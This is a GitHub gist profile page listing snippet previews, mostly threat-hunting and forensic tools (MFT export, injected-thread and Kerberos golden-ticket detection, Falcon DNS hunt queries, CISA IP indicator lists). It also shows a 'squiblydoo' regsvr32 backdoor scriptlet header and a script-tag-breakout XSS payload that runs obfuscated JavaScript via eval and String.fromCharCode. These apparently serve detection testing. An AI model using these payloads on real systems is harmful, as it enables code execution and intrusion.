Skip to content

Instantly share code, notes, and snippets.

View cbresponse's full-sized avatar

cbresponse

0 followers · 7 following
View GitHub Profile
@cbresponse
cbresponse / test.ps1
Last active August 18, 2018 05:39
dsddddssfsf3rwfscsv
Powershell.exe get-process
@cbresponse
cbresponse / Export-MFT.ps1
Created June 18, 2018 12:53 — forked from secabstraction/Export-MFT.ps1
function Export-MFT {
<#
.SYNOPSIS
Extracts master file table from volume.
Version: 0.1
Author : Jesse Davis (@secabstraction)
License: BSD 3-Clause
.DESCRIPTION
@cbresponse
cbresponse / Get-InjectedThread.ps1
Created June 18, 2018 12:55 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@cbresponse
cbresponse / Backdoor.sct
Last active June 23, 2018 07:43 — forked from api0cradle/Backdoor-Minimalist.sct
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@cbresponse
cbresponse / noharm.ps1
Created July 2, 2018 02:53
function WriteMessage()
{
Write-Host "This is a test PowerShell Script that does no harm at all" -ForegroundColor Green -BackgroundColor DarkGray
}
WriteMessage
@cbresponse
cbresponse / Get-KerberosTicketGrantingTicket.ps1
Created June 29, 2019 05:21 — forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
function Get-KerberosTicketGrantingTicket
{
<#
.SYNOPSIS
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions
.DESCRIPTION
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.
@cbresponse
cbresponse / gist:410bdef54f5b45e36e8e40867d2b23d4
Created April 15, 2020 18:54 — forked from jonmarkgo/gist:3431818
</script><script language=javascript>eval(String.fromCharCode(102, 117, 110, 99, 116, 105, 111, 110, 32, 101, 110, 99, 111, 100, 101, 84, 111, 72, 101, 120, 40, 115, 116, 114, 41, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 114, 61, 34, 34, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 101, 61, 115, 116, 114, 46, 108, 101, 110, 103, 116, 104, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 99, 61, 48, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 104, 59, 10, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 99, 60, 101, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 104, 61, 115, 116, 114, 46, 99, 104, 97, 114, 67, 111, 100, 101, 65, 116, 40, 99, 43, 43, 41, 46, 116, 111, 83, 116, 114, 105, 110, 103, 40, 49, 54, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 104, 46, 108, 101, 110, 103, 116, 104, 60, 51, 41, 32, 104, 61, 34, 48, 34, 43, 104, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 114, 43, 61, 104, 59, 10, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 114, 101, 116, 117, 114, 110, 32, 114, 59, 10, 125, 10, 36
@cbresponse
cbresponse / FalconHuntqueries.md
Created January 5, 2021 10:13 — forked from ag-michael/FalconHuntqueries.md
Falcon hunt queries

timestamp convert:


 convert ctime(timestamp/1000)

.top,.club,.xyz,.ru domain lookups where the amount of lookup for the domain is more than 1 and less than 4 per computer


aid=* event_simpleName=DnsRequest | regex DomainName=".*\.top$|.*\.club$|.*\.xyz$|.*\.ru$|[0-9]+.*\.\w$" | stats values(ComputerName) count by DomainName| where count &lt;4 | sort – count
@cbresponse
cbresponse / CISA_IPs.xlsx
Created January 14, 2021 13:35
IP
94.244.56.190
72.221.232.141
46.173.117.50
72.210.252.142
46.100.54.77
93.85.82.148
72.166.243.197
45.227.194.14
45.224.105.212
@cbresponse
cbresponse / CISA_IPs.csv
Last active January 14, 2021 15:11
We can make this file beautiful and searchable if this error is corrected: No commas found in this CSV file in line 0.
94.244.56.190
72.221.232.141
46.173.117.50
72.210.252.142
46.100.54.77
93.85.82.148
72.166.243.197
45.227.194.14
45.224.105.212
93.116.122.209